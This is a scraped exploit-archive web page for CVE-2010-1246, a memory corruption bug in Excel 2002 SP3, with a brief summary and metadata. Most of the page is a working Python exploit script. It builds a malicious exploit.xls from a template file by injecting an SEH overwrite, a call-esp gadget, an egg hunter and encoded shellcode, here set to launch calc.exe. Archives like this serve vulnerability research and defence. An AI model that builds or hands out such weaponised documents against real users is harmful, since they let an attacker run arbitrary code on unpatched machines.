Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Excel RTD Memory Corruption - exploit.company
header-logo
Suggest Exploit
vendor:
Excel
by:
Unknown
9
CVSS
CRITICAL
Memory Corruption
119
CWE
Product Name: Excel
Affected Version From: Excel 2002 sp3
Affected Version To: Excel 2002 sp3
Patch Exists: YES
Related CWE: CVE-2010-1246
CPE: a:microsoft:excel:2002:sp3
Metasploit:
Other Scripts:
Platforms Tested:
2010

Excel RTD Memory Corruption

The exploit takes advantage of a memory corruption vulnerability in Excel 2002 sp3. It uses a combination of pop pop ret and call esp instructions to execute shellcode.

Mitigation:

Apply the latest security patches and updates from Microsoft.
Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14966.zip (moaub-10-exploit.zip)
'''

'''
  Title             :  Excel RTD Memory Corruption 
  Version           :  Excel 2002 sp3
  Analysis          :  http://www.abysssec.com
  Vendor            :  http://www.microsoft.com
  Impact            :  Critical
  Contact           :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           :  @abysssec
  CVE               :  CVE-2010-1246
  MOAUB Number      :  MOAUB_10_BA
'''



import sys

def main():
   
    try:
		fdR = open('src.xls', 'rb+')
		strTotal = fdR.read()
		str1 = strTotal[:4509]
		str2 = strTotal[5013:15000]
		str3 = strTotal[15800:]
		
		eip = "\xAd\x57\x00\x30"    # pop pop ret
		jmp = "\xF7\xC2\x03\x30"    # call esp
		
		#Egg Hunter	
		eggHunter = ""
		eggHunter += "\x90\x90\x90"
		eggHunter += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63"
		eggHunter += "\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7"		
		
		# shellcode calc.exe
		shellcode = '\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41'
		
		if len(eggHunter) > 266:
			print "[*] Error : Shellcode length is long"
			return
		if len(eggHunter) <=266:
			dif =266 - len(eggHunter)
			while dif > 0 :
				eggHunter += '\x90'
				dif = dif - 1
				
				
		if len(shellcode) > 800:
			print "[*] Error : Shellcode length is long"
			return
		if len(shellcode) <= 800:
			dif = 800 - len(shellcode)
			while dif > 0 :
				shellcode += '\x90'
				dif = dif - 1
				
		fdW= open('exploit.xls', 'wb+')
		fdW.write(str1)
		fdW.write("\x41\x41\x41")    # padding
		fdW.write(jmp)
		fdW.write(eggHunter)				
		fdW.write("\xeb\x06\x41\x41")   
		fdW.write(eip)
		fdW.write("\x81\xc4\x24\x16\x00\x00")  # add esp,2016
		fdW.write("\xc3")  #ret
		
		i = 0 
		while i < 54 :
			fdW.write("\x41\x41\x41\x41")    # padding
			i = i + 1
			
		fdW.write(str2)
		fdW.write(shellcode)
		fdW.write(str3)
		
		fdW.close()
		fdR.close()
		print '[-] Excel file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                
if __name__ == '__main__':
    main()

Navigation

Suggest Exploit

Services By CQR